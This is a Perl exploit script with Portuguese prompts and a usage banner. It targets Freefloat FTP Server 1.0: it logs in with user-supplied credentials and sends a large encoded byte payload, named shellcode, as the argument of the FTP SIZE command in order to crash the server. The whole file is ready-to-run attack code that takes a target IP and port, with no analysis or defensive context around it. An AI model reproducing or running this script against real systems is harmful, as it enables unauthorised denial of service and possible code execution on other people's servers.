#!/usr/bin/perl -w
#
# e-mail: fernando.mengalli@gmail.com
#
# Date: 06/09/2021 - 09 jun
#
# Version Vulnerable: Freefloat FTP Server 1.0
#
# vídeo: https://youtu.be/de3lCDHLWFE
#
# OS Tested: Windows XP PACK 3 Brazilian
#
use Net::FTP;
use Term::ANSIColor;
$sis="$^O";
print $sis;
if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}
system("$cmd");
if ((!$ARGV[0]) || (!$ARGV[1])) {
&apresentacao();
}
sub apresentacao {
print q {
#############################################################################
# #
# [*] Freefloat FTP Server 1.0 - 'SIZE' - Denied of Service #
# #
# Author: Fernando Mengali #
# #
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #
# #
############################ Code Exploit ###################################
}
}
our $alvo = $ARGV[0];
our $porta = $ARGV[1];
if (!$ARGV[0] && !$ARGV[1]) {
exit;
}
if($alvo !~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) {
print color('red bold');
print " \n\n [-] Por favor, defina o IP alvo! \n\n";
color('reset');
exit;
}
if($porta < 0 || $porta > 65535) {
print color('red bold');
print " \n\n [-] Por favor, defina uma porta de 1 a 65535! \n\n";
color('reset');
exit;
}
print color('green bold');
print "\n\nAlvo definido =>" .$alvo . " \n \n";
print "Porta definida =>" .$porta . "\n\n";
color('reset');
print color('yellow bold');
print "[+] Por favor, informe a nome de usuário: ";
color('reset');
print color('red bold');
my $usuario = <stdin>;
chomp($usuario);
color('reset');
print color('yellow bold');
print "[*] Por favor, informe a senha de acesso: ";
color('reset');
print color('red bold');
my $senha = <stdin>;
chomp($senha);
color('reset');
my $shellcode =
"\xba\x17\x61\x66\xaf\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b\xc9" .
"\xb1\x60\x31\x55\x12\x83\xed\xfc\x03\x42\x6f\x84\x5a\xb7" .
"\xa9\xf0\x15\x7b\xd9\xfb\x8f\xf7\x01\x08\x75\xdc\x80\x41" .
"\xd3\x13\x51\xba\xe7\x11\x4d\x39\x25\x21\xb3\x27\x8b\x30" .
"\xef\xf1\xac\xbd\x95\xe9\xcf\x1a\x1d\xb9\xe1\xf6\x27\x0b" .
"\xff\x02\x98\xc0\xf6\xc7\x19\x52\xc4\x94\x18\xdb\x56\x20" .
"\xb6\x9a\xc4\xb5\xec\xf3\x40\xd4\x19\x17\x6d\x35\x50\x3a" .
"\x13\xc3\xb3\xf0\x38\x8d\xff\xc5\x05\x55\x33\xe7\xd2\x9e" .
"\xb6\x8c\x9b\x79\xce\x8f\xd6\x30\x72\x12\x62\x26\x3e\xed" .
"\xef\xda\x23\x88\x07\x74\xdc\xbe\xe1\xc4\x3e\x91\x8a\x26" .
"\x3a\x3f\x2b\xf2\xe5\x3a\x18\x0f\xd0\x8d\x7b\xba\xf3\xba" .
"\x2b\x5b\xa5\x2d\x54\xaa\x88\x68\x4b\xf4\xcc\x24\x68\xc1" .
"\x19\x22\xf9\x08\xd6\x08\x8f\x4a\xe0\x7d\x67\xc1\x4e\xd8" .
"\x08\x34\x44\x2b\x6a\x6f\x41\x6d\x53\x26\x73\x9d\xb4\xca" .
"\x87\xed\xe6\x2d\x8b\x1c\x42\x0e\xb3\x20\xd0\xa1\x48\x97" .
"\x45\x46\x26\x6b\xe7\x74\x52\xc1\xae\x2d\x8d\x1a\x06\xe0" .
"\x24\x26\xbe\xfe\x26\xf8\x48\x75\x73\x5d\x6c\x67\xeb\xf4" .
"\xf4\x08\x91\xf8\x5f\x4a\x3a\xd4\x5c\xd4\x7c\x52\x13\xa5" .
"\x08\x06\xc9\x8b\x04\x9a\x0f\xe5\xe8\x1f\xef\x28\x3b\xe9" .
"\x6e\xf9\xee\x7e\xf0\x5c\x5e\x4f\x95\x49\x0f\x83\xf0\x70" .
"\x09\xf6\x83\xe9\x43\xb8\xe0\x88\x51\x6e\x9c\x5d\x48\x5b" .
"\x9b\xca\x9a\xf1\x48\xa8\x51\x22\x61\x12\x55\xfe\x10\x16" .
"\xb5\x42\x42\xff\x15\x14\x3f\x44\x9b\x92\xfc\xd9\x67\xe0" .
"\x15\xd1\x64\xce\x75\xec\xa3\x08\x03\x61\x4a\x3b\x0e\x5a" .
"\xb0\x7b\xe6\x2c\xac\xae\x5d\xad\x71\xf5\xb8\xc4\x4f\xd3" .
"\xf4\x40\x2b\x92\x75\x83\xe3\x0f\x4c\x23\x78\x72\x0f\x22" .
"\xb9\x10\xa6\x1d\xc9\xcb\xca\xe5\x61\xf8\x5f\x64\x86\x49" .
"\x5b\xb2\x9e\x75\x30\xc6\x6e\x3c\x9a\x02\xad\x03\x36\x29" .
"\xaf\x84\x62\x98\x22\xcd\xbf\x7e\xa2\x14\x97\x75\xa2\xc3" .
"\xab";
$payload = $shellcode . "\r\n";
print color('cyan');
print "\n\n[+] Conectando para o servidor " . $alvo . ":" . $porta."... \n";
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die color('red')."\n[-] Não foi possível conectar. \n";
sleep(2);
print "[+] Conectado!\n";
sleep(2);
$ftp->login($usuario,$senha) || die color('red')."\n [-] Não pode conectar ou você derrubou: $!";
print "[+] Autenticando...\n";
sleep(2);
print "[+] Autenticado com sucesso!\n\n";
sleep(2);
print "[*] Sobrecarregando o servidor...\n\n";
sleep(2);
$ftp->command("SIZE ", $payload);
color('reset');
print color('green bold');
print "[+] Servidor fora do ar!\n";
color('reset');
exit(0);
